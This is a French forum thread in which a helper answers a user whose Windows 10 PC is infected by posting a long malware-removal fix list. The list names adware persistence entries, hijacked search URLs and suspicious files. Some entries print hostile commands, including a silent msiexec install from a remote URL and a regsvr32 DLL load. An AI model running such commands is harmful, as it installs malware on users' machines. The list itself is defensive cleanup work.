Windows 10 infecté, fenêtres et pages s'ouvrent

Tisba · par **Tisba** » 04 mars 2017 03:06

Bonjour,

http://pjjoint.malekal.com/files.php?id ... 2r7m15z5o8
http://pjjoint.malekal.com/files.php?id ... 11i13d7z14
http://pjjoint.malekal.com/files.php?id ... q7g8n14w10

Aider moi svp

par **angelique** » 04 mars 2017 10:40

Bonjour,

Ouvre le bloc-notes : Menu Démarrer / Tous les programmes / Accessoires et Bloc-Notes. (ou executer➫notepad)
Copie/colle dedans ce qui suit :

Code : Tout sélectionner

Task: {0AC37612-8AFE-48FE-8A88-733B1E2004F9} - System32\Tasks\psv_Hayfax => cmd.exe /c regedit.exe /s "C:\ProgramData\Subair\Duolam.reg" & del "C:\ProgramData\Subair\Duolam.reg" & SCHTASKS /Delete /TN "psv_Hayfax" /F <==== ATTENTION
Task: {17D06BA7-8E27-4F35-BCB8-63E1090D8BD2} - System32\Tasks\PC SpeedUp Service Deactivator => C:\Program Files (x86)\Accelerer PC\PCSUSD.exe  <==== ATTENTION
Task: {1F5478CF-0ACF-48FB-858A-49CF793EFF26} - System32\Tasks\RunAtStartup => C:\Users\KLEBER\AppData\Roaming\Event Monitor\em.exe [2017-01-05] () <==== ATTENTION
Task: {1F6019EB-976B-4605-BDCE-E43BDB83EE18} - System32\Tasks\SMW_P => C:\ProgramData\smp2.exe [2017-03-04] () <==== ATTENTION
Task: {2158741A-8BA0-4A62-959B-7A5EAA910E17} - System32\Tasks\Traffic Exchange v209 - 3 => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe [2017-02-07] (Microleaves LTD) <==== ATTENTION
Task: {221B9360-17BB-4587-8A58-59505FD6C965} - \WPD\SqmUpload_S-1-5-21-4292462852-3603650165-3095289502-1002 -> Pas de fichier <==== ATTENTION
Task: {373656AC-6927-4A34-A3C1-79648ED8743A} - System32\Tasks\Traffic Exchange v2 - 2 => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe [2016-11-22] (Microleaves LTD) <==== ATTENTION
Task: {37901313-2EDC-41DF-9882-00B66310AA7C} - System32\Tasks\{D4E6AE25-1318-43C0-0401-E989941EA42B} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\c25d4f9f\d5e7cab5.dll" <==== ATTENTION
Task: {38C2F0BB-A08E-400C-97F3-37165372AEC5} - System32\Tasks\psv_Trustcof => cmd.exe /c regedit.exe /s "C:\ProgramData\Subair\Ontodox.reg" & del "C:\ProgramData\Subair\Ontodox.reg" & SCHTASKS /Delete /TN "psv_Trustcof" /F <==== ATTENTION
Task: {413FAC47-3F18-4DD3-9905-15C999EE63D8} - System32\Tasks\Traffic Exchange => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian.exe [2016-08-17] (Microleaves LTD) <==== ATTENTION
Task: {42441492-4352-4453-8CDF-23FE5A2EB2B5} - System32\Tasks\PC Clean Plus_DEFAULT => C:\Program Files (x86)\PC Clean Plus\PCCleanPlus.exe  <==== ATTENTION
Task: {44022D71-7F22-42BF-9A09-7C6743AC2E2D} - System32\Tasks\Traffic Exchange v2 - 1 => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe [2016-11-22] (Microleaves LTD) <==== ATTENTION
Task: {4A72720A-2013-44FC-8FFB-35C267471128} - System32\Tasks\HDWallPaper => C:\Program Files (x86)\HDWallPaper\HDWallPaper.exe  <==== ATTENTION
Task: {4FA418A5-DEE8-461E-A8BC-F21CC577CDDD} - System32\Tasks\Nusgoht => C:\PROGRA~1\GROOVE~1\Uenobk.bat  <==== ATTENTION
Task: {511AF648-E4E3-42F1-A7EF-195962C834E9} - System32\Tasks\WinZip Update Notifier => C:\Program Files\WinZip\WZUpdateNotifier.exe [2017-02-13] (WinZip)
Task: {59F762A2-3F33-437B-8755-30D1C733B9A2} - System32\Tasks\Kutbe => C:\PROGRA~1\SHOPPE~2\Quyelg.bat  <==== ATTENTION
Task: {5A5542A2-9B1A-4329-A8FF-0AE6F8179A60} - System32\Tasks\psv_Jobzap => cmd.exe /c regedit.exe /s "C:\ProgramData\Subair\Yearlam.reg" & del "C:\ProgramData\Subair\Yearlam.reg" & SCHTASKS /Delete /TN "psv_Jobzap" /F <==== ATTENTION
Task: {656F1452-453D-4795-9909-E97F76A6861E} - System32\Tasks\psv_Konk-Fresh => cmd.exe /c regedit.exe /s "C:\ProgramData\Subair\Cofcom.reg" & del "C:\ProgramData\Subair\Cofcom.reg" & SCHTASKS /Delete /TN "psv_Konk-Fresh" /F <==== ATTENTION
Task: {6BF173F8-59C6-4025-813F-0ECC6D015659} - System32\Tasks\Ckofodom => msiexec /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=HGSTXHTS541010A9E680_JD1008DMG5R3LWG5R3LWX&v=201733 /q
Task: {6EBF430B-0700-4B14-B3EC-7A588F0661C8} - System32\Tasks\psv_Apotfan => cmd.exe /c regedit.exe /s "C:\ProgramData\Subair\ToughMatis.reg" & del "C:\ProgramData\Subair\ToughMatis.reg" & SCHTASKS /Delete /TN "psv_Apotfan" /F <==== ATTENTION
Task: {729FAE9F-3774-45C8-8C7E-48ABF968DFD4} - System32\Tasks\psv_Dripplus => cmd.exe /c regedit.exe /s "C:\ProgramData\Subair\Tontrax.reg" & del "C:\ProgramData\Subair\Tontrax.reg" & SCHTASKS /Delete /TN "psv_Dripplus" /F <==== ATTENTION
Task: {80AB5B9D-0BF1-4086-9B47-C82F636ADD73} - System32\Tasks\Traffic Exchange v209 - 1 => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe [2017-02-07] (Microleaves LTD) <==== ATTENTION
Task: {81CD8503-544A-4158-A3BB-F5CE1CB78C15} - System32\Tasks\psv_Zumwarm => cmd.exe /c regedit.exe /s "C:\ProgramData\Subair\Warmphase.reg" & del "C:\ProgramData\Subair\Warmphase.reg" & SCHTASKS /Delete /TN "psv_Zumwarm" /F <==== ATTENTION
Task: {8220839E-DE12-4520-B3FA-48366C0692CC} - System32\Tasks\Reuhyreiluty Launcher => C:\Program Files (x86)\Reilechjpu\xfpoward.exe 
Task: {84AF739A-8232-47A3-954B-60E0F3301AB3} - System32\Tasks\GI9HIh2mhI => C:\Program Files (x86)\A3JxMfi7Mh\updengine.exe  <==== ATTENTION
Task: {87B8F1DE-C277-4983-BA35-DCD1BD939A56} - System32\Tasks\psv_Funfix => cmd.exe /c regedit.exe /s "C:\ProgramData\Subair\Quoron.reg" & del "C:\ProgramData\Subair\Quoron.reg" & SCHTASKS /Delete /TN "psv_Funfix" /F <==== ATTENTION
Task: {8D3BFDEF-C829-4E1D-A356-C85653E25879} - System32\Tasks\{68F97741-DF52-C0EA-8612-7427443EE1F2} => C:\ProgramData\{E8078055-5FAC-37FE-CC5A-B6BC1B966FC4}\E95D5FD9-5EF6-E872-799C-6206321AF496.exe [2017-03-04] () <==== ATTENTION
Task: {905AA111-D723-42C2-9CA8-833C1D3C6340} - System32\Tasks\WinZipBackGroundToolsTask => C:\Program Files\WinZip\WzBGTools.exe [2017-02-13] (WinZip Computing, S.L.)
Task: {91D97CFE-DFA8-42F5-A288-8FEFC05E5EBD} - System32\Tasks\hostTask => C:\ProgramData\PrefsSecure\tree.exe [2017-03-03] ()
Task: {A55B8714-FFB6-46B9-8903-7EF6FE4F5CCC} - System32\Tasks\{F5837DF0-222A-4D18-8766-F667AD24917D} => pcalua.exe -a C:\Users\KLEBER\AppData\Roaming\mysites123\UninstallManager.exe -c  -ptid=tt4u
Task: {B03F2FD8-2DFF-40DF-BB04-62A8E6B27890} - System32\Tasks\Traffic Exchange Guard => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian.exe [2016-08-17] (Microleaves LTD) <==== ATTENTION
Task: {B174EDAC-7DCB-429E-8981-61886D5E5A0C} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Pas de fichier <==== ATTENTION
Task: {BC2574BF-6134-4F1E-B13D-5AF03B4C73B4} - System32\Tasks\Auslogics\BoostSpeed\Scan and Repair => Rundll32.exe TaskSchedulerHelper.dll,RunTask "BoostSpeed.exe" "-UseTray -Schedule"
Task: {BCC97ADB-7A85-4101-8A79-34CADB4C3737} - System32\Tasks\Traffic Exchange Updater => C:\Program Files (x86)\Microleaves\Traffic Exchange\Traffic Exchange Updater.exe [2017-02-15] (Microleaves) <==== ATTENTION
Task: {BD22901F-4EAE-4466-9E40-185506654EC4} - System32\Tasks\Traffic Exchange v209 - 2 => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe [2017-02-07] (Microleaves LTD) <==== ATTENTION
Task: {C0D35572-93FC-4C74-ABCD-A20BC8641317} - System32\Tasks\PC Clean Plus_UPDATES => C:\Program Files (x86)\PC Clean Plus\PCCleanPlus.exe  <==== ATTENTION
Task: {C5101F53-5097-452B-89C1-C569DDFD8D3E} - System32\Tasks\Papdyrpe => C:\PROGRA~1\SHOPPE~1\Akagpu.bat  <==== ATTENTION
Task: {D7C0811D-1F97-4AF9-9DCA-F1FD5C286A16} - System32\Tasks\Traffic Exchange v2 - 3 => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe [2016-11-22] (Microleaves LTD) <==== ATTENTION
Task: {E7C2D722-6D73-4879-B802-A2653C3687C9} - System32\Tasks\Traffic Exchange Guardian => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian.exe [2016-08-17] (Microleaves LTD) <==== ATTENTION
Task: {EAAFD5C0-D923-45DD-8216-7A099D44C346} - System32\Tasks\SMW_UpdateTask_Time_333537333134303631322d785b233457414a45415a506c => Wscript.exe //B "C:\ProgramData\SearchModule\smhe.js" smu.exe /invoke /f:check_services /l:0 <==== ATTENTION
Task: {F49ED8CD-7220-4378-98A1-C72AF124F49E} - System32\Tasks\psv_Tip-Lux => cmd.exe /c regedit.exe /s "C:\ProgramData\Subair\Biosanfan.reg" & del "C:\ProgramData\Subair\Biosanfan.reg" & SCHTASKS /Delete /TN "psv_Tip-Lux" /F <==== ATTENTION
Task: {F9F101BD-A70E-403D-BDE7-C01CA0B74177} - System32\Tasks\Auslogics\BoostSpeed\Start BoostSpeed оn KLEBER logon => C:\Program Files (x86)\Auslogics\BoostSpeed\BoostSpeed.exe [2017-02-15] (Auslogics)
Task: {FAAE3AC2-0C2A-4C77-BC50-99CBDBFF8F3A} - System32\Tasks\psv_Vaiatam => cmd.exe /c regedit.exe /s "C:\ProgramData\Subair\Hottex.reg" & del "C:\ProgramData\Subair\Hottex.reg" & SCHTASKS /Delete /TN "psv_Vaiatam" /F <==== ATTENTION
Task: {FCB31B5F-0D69-4EE4-8BBD-9E8FB8FCD54F} - System32\Tasks\PC Clean Plus => C:\Program Files (x86)\PC Clean Plus\PCCleanPlus.exe  <==== ATTENTION
Task: C:\WINDOWS\Tasks\PC Clean Plus_DEFAULT.job => C:\Program Files (x86)\PC Clean Plus\PCCleanPlus.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\PC Clean Plus_UPDATES.job => C:\Program Files (x86)\PC Clean Plus\PCCleanPlus.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\PC SpeedUp Service Deactivator.job => C:\Program Files (x86)\Accelerer PC\PCSUSD.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Traffic Exchange Updater.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\Traffic Exchange Updater.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Traffic Exchange v2 - 1.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Traffic Exchange v2 - 2.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Traffic Exchange v2 - 3.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Traffic Exchange v209 - 1.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Traffic Exchange v209 - 2.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Traffic Exchange v209 - 3.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== ATTENTION
ShortcutWithArgument: C:\Users\KLEBER\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=h33zbcnbl1bu,2d4efbcc-3bbc-41c9-bf48-8d1787d65185,
ShortcutWithArgument: C:\Users\KLEBER\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=h33zbcnbl1bu,2d4efbcc-3bbc-41c9-bf48-8d1787d65185,
ShortcutWithArgument: C:\Users\KLEBER\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> "microsoft-edge:hxxp://www%2dsearching.com/?prd=set_epe&s=h33zbcnbl1bu,2d4efbcc-3bbc-41c9-bf48-8d1787d65185,"
HKLM\...\Run: [95InoD85cW.exe] => C:\ProgramData\{95b-e2-c7-9a442-ab86e-24b3-760b9}\95InoD85cW.exe [409088 2017-03-03] (Windows)
HKLM\...\RunOnce: [46L+u&x1l7.exe] => C:\ProgramData\{95b-e2-c7-9a442-ab86e-24b3-760b9}\46L+u&x1l7.exe [552960 2017-03-03] (application)
HKU\S-1-5-21-4292462852-3603650165-3095289502-1002\...\Run: [3BKVE5JIZB] => C:\Program Files\H6RJPVJ8KN\UVYYXUP9K.exe [896000 2017-03-03] (SIR6VJPGK)
HKU\S-1-5-21-4292462852-3603650165-3095289502-1002\...\Run: [RWORK5C52K] => C:\Program Files\382MOPAWJH\382MOPAWJ.exe [896000 2017-03-03] (SIR6VJPGK)
HKU\S-1-5-21-4292462852-3603650165-3095289502-1002\...\Run: [MJRYKWZL9N] => "C:\Program Files (x86)\BeCleaner\WAJCA.exe"
HKU\S-1-5-21-4292462852-3603650165-3095289502-1002\...\Run: [9QZQ59O2UH] => C:\Program Files\V6L4AMDS48\LKYYQLPU3.exe [896000 2017-03-04] (SIR6VJPGK)
HKU\S-1-5-21-4292462852-3603650165-3095289502-1002\...\Run: [VW7GE61YGS] => C:\Program Files\V7Y9L6EOMK\JLJC8EKF2.exe [896000 2017-03-04] (SIR6VJPGK)
HKU\S-1-5-21-4292462852-3603650165-3095289502-1002\...\Run: [PCSpeedUp] => C:\Program Files (x86)\Accelerer PC\PCSUNotifier.exe <===== ATTENTION
HKLM\...\Providers\kbbt3eno: C:\Program Files (x86)\Reuhyreiluty Launcher\local64spl.dll [311808 2017-03-03] ()
ShellExecuteHooks: Pas de nom - {36CEA340-FF2C-11E6-AB54-64006A5CFC23} - C:\Users\KLEBER\AppData\Roaming\Mowercultckumition\Pmiward.dll -> Pas de fichier
ShortcutTarget: FAH.lnk -> C:\Program Files\WinZip\FAHConsole.exe (WinZip Computing, S.L.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Notifications de Mises à jour.lnk [2017-02-21]
ShortcutTarget: Notifications de Mises à jour.lnk -> C:\Program Files\WinZip\WZUpdateNotifier.exe (WinZip)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\WinZip Préchargeur.lnk [2017-02-21]
ShortcutTarget: WinZip Préchargeur.lnk -> C:\Program Files\WinZip\WzPreloader.exe (WinZip Computing, S.L.)
HKU\S-1-5-21-4292462852-3603650165-3095289502-1002\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyuZn5X7qpkDH3GIkPLn1XtiXNPBMBHGElFy0rYWIpMLtVX4rihwGx2akCc56CnqyDfXMt2RWFODGboYs8kMZYDxsR2CmQzUaUDk4GAY7hIoOEu1DF4_cm1gPN08tIC1ksJWl6aDDSa3fxxbInmU4AzqXOPXcB1-&q={searchTerms}
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyuZn5X7qpkDH3GIkPLn1XtiXNPBMBHGElFy0rYWIpMLtVX4rihwGx2akCc56CnqyDfXMt2RWFODGboYs8kMZYDxsR2CmQzUaUDk4GAY7hIoOEu1DF4_cm1gPN08tIC1ksJWl6aDDSa3fxxbInmU4AzqXOPXcB1-&q={searchTerms}
SearchScopes: HKU\S-1-5-21-4292462852-3603650165-3095289502-1002 -> {ielnksrch} URL = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyuZn5X7qpkDH3GIkPLn1XtiXNPBMBHGElFy0rYWIpMLtVX4rihwGx2akCc56CnqyDfXMt2RWFODGboYs8kMZYDxsR2CmQzUaUDk4GAY7hIoOEu1DF4_cm1gPN08tIC1ksJWl6aDDSa3fxxbInmU4AzqXOPXcB1-&q={searchTerms}
BHO: Pas de nom -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> Pas de fichier
FF HKLM\...\Firefox\Extensions: [{DF4627D5-D0B1-483D-8B82-35A000FD0B43}] - C:\Program Files\shopperz030220162012\Firefox\{DF4627D5-D0B1-483D-8B82-35A000FD0B43}.xpi => non trouvé(e)
FF HKLM\...\Firefox\Extensions: [{9E633075-4A74-4EB6-8EED-4364E5237B2C}] - C:\Program Files\shopperz030220162022\Firefox\{9E633075-4A74-4EB6-8EED-4364E5237B2C}.xpi => non trouvé(e)
FF HKLM-x32\...\Firefox\Extensions: [{DF4627D5-D0B1-483D-8B82-35A000FD0B43}] - C:\Program Files\shopperz030220162012\Firefox\{DF4627D5-D0B1-483D-8B82-35A000FD0B43}.xpi => non trouvé(e)
FF HKLM-x32\...\Firefox\Extensions: [{9E633075-4A74-4EB6-8EED-4364E5237B2C}] - C:\Program Files\shopperz030220162022\Firefox\{9E633075-4A74-4EB6-8EED-4364E5237B2C}.xpi => non trouvé(e)
FF HKLM-x32\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\McAfee\MSK => non trouvé(e)
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [Pas de fichier]
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL [Pas de fichier]
R2 Nettrans; C:\ProgramData\PrefsSecure\Nettrans.exe [43520 2017-03-04] () [Fichier non signé]
R2 NetUtils2016srv; C:\WINDOWS\SysWOW64\NetUtils2016.exe [470592 2017-03-03] ()
R2 SMUpd; C:\Program Files\Common Files\Noobzo\GNUpdate\smu.exe [3110912 2017-03-04] (Search Module Ltd.) [Fichier non signé] <==== ATTENTION
S2 PCSUService; C:\Program Files (x86)\Accelerer PC\PCSUService.exe [X]
S2 SCService; "C:\Program Files (x86)\Accelerer PC\SpeedCheckerService.exe" [X]
R1 NetUtils2016; C:\WINDOWS\system32\drivers\NetUtils2016.sys [909944 2017-03-03] () <==== ATTENTION
R3 SMUpdd; C:\Program Files\Common Files\Noobzo\GNUpdate\smw.sys [52992 2017-03-04] ()
2017-03-04 01:09 - 2017-03-04 01:09 - 00004404 _____ C:\WINDOWS\System32\Tasks\SMW_UpdateTask_Time_333537333134303631322d785b233457414a45415a506c
2017-03-04 01:09 - 2017-03-04 01:09 - 00000000 ____D C:\ProgramData\SearchModule
2017-03-04 01:09 - 2017-03-04 01:09 - 00000000 ____D C:\Program Files\Common Files\Noobzo
2017-03-04 01:08 - 2017-03-04 01:08 - 00187904 _____ C:\WINDOWS\rsrcs.dll
2017-03-04 00:49 - 2017-03-04 00:49 - 00003326 _____ C:\WINDOWS\System32\Tasks\psv_Konk-Fresh
2017-03-04 00:39 - 2017-03-04 00:39 - 00003326 _____ C:\WINDOWS\System32\Tasks\psv_Tip-Lux
2017-03-04 00:32 - 2017-03-04 00:32 - 00003330 _____ C:\WINDOWS\System32\Tasks\psv_Apotfan
2017-03-04 00:32 - 2017-03-04 00:32 - 00003326 _____ C:\WINDOWS\System32\Tasks\psv_Zumwarm
2017-03-04 00:32 - 2017-03-04 00:32 - 00003310 _____ C:\WINDOWS\System32\Tasks\psv_Hayfax
2017-03-04 00:27 - 2017-03-04 02:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accelerer PC
2017-03-04 00:27 - 2017-03-04 00:30 - 00000356 _____ C:\WINDOWS\Tasks\PC SpeedUp Service Deactivator.job
2017-03-04 00:27 - 2017-03-04 00:27 - 00002814 _____ C:\WINDOWS\System32\Tasks\PC SpeedUp Service Deactivator
2017-03-04 00:25 - 2017-03-04 00:27 - 00000000 ____D C:\ProgramData\7a2b7377-4463-0
2017-03-04 00:21 - 2017-03-04 00:21 - 00003322 _____ C:\WINDOWS\System32\Tasks\psv_Trustcof
2017-03-04 00:17 - 2017-03-04 00:18 - 00000000 ____D C:\Users\KLEBER\AppData\Local\Biqage
2017-03-04 00:17 - 2017-03-04 00:17 - 00000000 ____D C:\Program Files\V7Y9L6EOMK
2017-03-04 00:12 - 2017-03-04 00:12 - 00000000 ____D C:\ProgramData\b4dced03-6791-0
2017-03-04 00:12 - 2017-03-04 00:12 - 00000000 ____D C:\ProgramData\b4dced03-0367-1
2017-03-04 00:11 - 2017-03-04 00:11 - 00003974 _____ C:\WINDOWS\System32\Tasks\{68F97741-DF52-C0EA-8612-7427443EE1F2}
2017-03-04 00:11 - 2017-03-04 00:11 - 00003884 _____ C:\WINDOWS\System32\Tasks\{D4E6AE25-1318-43C0-0401-E989941EA42B}
2017-03-04 00:11 - 2017-03-04 00:11 - 00000000 ____D C:\ProgramData\c25d4f9f
2017-03-04 00:11 - 2017-03-04 00:11 - 00000000 ____D C:\ProgramData\89e90104-4aa7-0
2017-03-04 00:11 - 2017-03-04 00:11 - 00000000 ____D C:\ProgramData\{E8078055-5FAC-37FE-CC5A-B6BC1B966FC4}
2017-03-04 00:11 - 2017-03-04 00:11 - 00000000 ____D C:\ProgramData\{349f1790-512c-0}
2017-03-04 00:11 - 2017-03-04 00:11 - 00000000 ____D C:\ProgramData\{0e1e677d-412c-1}
2017-03-04 00:09 - 2017-03-04 00:25 - 00000000 ____D C:\ProgramData\7a2b7377-4035-0
2017-03-04 00:09 - 2017-03-04 00:11 - 00000000 ____D C:\ProgramData\7a2b7377-03e5-1
2017-03-04 00:04 - 2017-03-04 00:04 - 00003310 _____ C:\WINDOWS\System32\Tasks\psv_Funfix
2017-03-04 00:00 - 2017-03-04 01:08 - 00004232 _____ C:\WINDOWS\System32\Tasks\SMW_P
2017-03-04 00:00 - 2017-03-04 00:00 - 00326656 _____ C:\ProgramData\smp2.exe
2017-03-04 00:00 - 2017-03-04 00:00 - 00000000 ____D C:\Program Files\V6L4AMDS48
2017-03-03 23:58 - 2017-03-04 00:32 - 00002379 _____ C:\WINDOWS\SysWOW64\findit.xml
2017-03-03 23:58 - 2017-03-03 23:59 - 00000000 ____D C:\Program Files\382MOPAWJH
2017-03-03 23:58 - 2017-03-03 23:58 - 01938537 _____ C:\Users\KLEBER\AppData\Roaming\Trusthold.bin
2017-03-03 23:58 - 2017-03-03 23:58 - 00003322 _____ C:\WINDOWS\System32\Tasks\psv_Dripplus
2017-03-03 23:58 - 2017-03-03 23:58 - 00003314 _____ C:\WINDOWS\System32\Tasks\psv_Vaiatam
2017-03-03 23:58 - 2017-03-03 23:58 - 00003314 _____ C:\WINDOWS\System32\Tasks\psv_Jobzap
2017-03-03 23:58 - 2017-03-03 23:58 - 00000000 ____D C:\ProgramData\Subairs
2017-03-03 23:58 - 2017-03-03 23:58 - 00000000 ____D C:\ProgramData\Logic Cramble
2017-03-03 23:57 - 2017-03-04 01:27 - 00003108 _____ C:\WINDOWS\System32\Tasks\RunAtStartup
2017-03-03 23:57 - 2017-03-04 01:27 - 00000000 ____D C:\Users\KLEBER\AppData\Roaming\Event Monitor
2017-03-03 23:57 - 2017-03-04 00:01 - 00000298 _____ C:\WINDOWS\Tasks\PC Clean Plus_UPDATES.job
2017-03-03 23:57 - 2017-03-04 00:01 - 00000290 _____ C:\WINDOWS\Tasks\PC Clean Plus_DEFAULT.job
2017-03-03 23:57 - 2017-03-03 23:57 - 07288832 _____ C:\Users\KLEBER\AppData\Roaming\agent.dat
2017-03-03 23:57 - 2017-03-03 23:57 - 01891575 _____ C:\Users\KLEBER\AppData\Roaming\Volttip.tst
2017-03-03 23:57 - 2017-03-03 23:57 - 00278510 _____ C:\Users\KLEBER\AppData\Roaming\Zaameco.bin
2017-03-03 23:57 - 2017-03-03 23:57 - 00126464 _____ C:\Users\KLEBER\AppData\Roaming\noah.dat
2017-03-03 23:57 - 2017-03-03 23:57 - 00070752 _____ C:\Users\KLEBER\AppData\Roaming\Config.xml
2017-03-03 23:57 - 2017-03-03 23:57 - 00018432 _____ C:\Users\KLEBER\AppData\Roaming\Main.dat
2017-03-03 23:57 - 2017-03-03 23:57 - 00005568 _____ C:\Users\KLEBER\AppData\Roaming\md.xml
2017-03-03 23:57 - 2017-03-03 23:57 - 00003266 _____ C:\WINDOWS\System32\Tasks\PC Clean Plus_DEFAULT
2017-03-03 23:57 - 2017-03-03 23:57 - 00003184 _____ C:\WINDOWS\System32\Tasks\PC Clean Plus
2017-03-03 23:57 - 2017-03-03 23:57 - 00003092 _____ C:\WINDOWS\System32\Tasks\PC Clean Plus_UPDATES
2017-03-03 23:57 - 2017-03-03 23:57 - 00003078 _____ C:\WINDOWS\System32\Tasks\hostTask
2017-03-03 23:57 - 2017-03-03 23:57 - 00000000 ____D C:\ProgramData\PrefsSecure
2017-03-03 23:57 - 2017-03-03 23:57 - 00000000 ____D C:\Program Files\H6RJPVJ8KN
2017-03-03 23:57 - 2017-03-03 23:56 - 01120768 _____ C:\Users\KLEBER\AppData\Roaming\Volttip.exe
2017-03-03 23:56 - 2017-03-04 00:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PC Clean Plus
2017-03-03 23:56 - 2017-03-04 00:00 - 00000000 ____D C:\Users\KLEBER\AppData\Roaming\PC Clean Plus
2017-03-03 23:56 - 2017-03-03 23:56 - 00140288 _____ C:\Users\KLEBER\AppData\Roaming\Installer.dat
2017-03-03 23:56 - 2017-03-03 23:56 - 00016224 _____ C:\Users\KLEBER\AppData\Roaming\InstallationConfiguration.xml
2017-03-03 23:56 - 2017-03-03 23:56 - 00000000 ____D C:\ProgramData\{95b-e2-c7-9a442-ab86e-24b3-760b9}
2017-03-03 23:53 - 2017-03-03 23:53 - 00000000 ____D C:\ProgramData\Microleaves
2017-03-03 23:50 - 2017-03-04 01:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HDWallPaper
2017-03-03 23:50 - 2017-03-04 01:03 - 00625272 _____ C:\WINDOWS\system32\NetUtils2016.dll
2017-03-03 23:50 - 2017-03-04 00:01 - 00000384 ____H C:\WINDOWS\Tasks\Traffic Exchange Updater.job
2017-03-03 23:50 - 2017-03-04 00:01 - 00000342 _____ C:\WINDOWS\Tasks\Traffic Exchange v209 - 3.job
2017-03-03 23:50 - 2017-03-04 00:01 - 00000342 _____ C:\WINDOWS\Tasks\Traffic Exchange v209 - 2.job
2017-03-03 23:50 - 2017-03-04 00:01 - 00000342 _____ C:\WINDOWS\Tasks\Traffic Exchange v209 - 1.job
2017-03-03 23:50 - 2017-03-04 00:01 - 00000332 _____ C:\WINDOWS\Tasks\Traffic Exchange v2 - 3.job
2017-03-03 23:50 - 2017-03-04 00:01 - 00000332 _____ C:\WINDOWS\Tasks\Traffic Exchange v2 - 2.job
2017-03-03 23:50 - 2017-03-04 00:01 - 00000332 _____ C:\WINDOWS\Tasks\Traffic Exchange v2 - 1.job
2017-03-03 23:50 - 2017-03-03 23:51 - 00000000 ____D C:\Users\KLEBER\AppData\Roaming\Microleaves
2017-03-03 23:50 - 2017-03-03 23:50 - 00909944 _____ C:\WINDOWS\system32\Drivers\NetUtils2016.sys
2017-03-03 23:50 - 2017-03-03 23:50 - 00470592 _____ C:\WINDOWS\SysWOW64\NetUtils2016.exe
2017-03-03 23:50 - 2017-03-03 23:50 - 00003708 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange Guardian
2017-03-03 23:50 - 2017-03-03 23:50 - 00003702 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange Guard
2017-03-03 23:50 - 2017-03-03 23:50 - 00003690 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange
2017-03-03 23:50 - 2017-03-03 23:50 - 00003272 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange Updater
2017-03-03 23:50 - 2017-03-03 23:50 - 00003260 _____ C:\WINDOWS\System32\Tasks\HDWallPaper
2017-03-03 23:50 - 2017-03-03 23:50 - 00003234 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange v209 - 3
2017-03-03 23:50 - 2017-03-03 23:50 - 00003234 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange v209 - 2
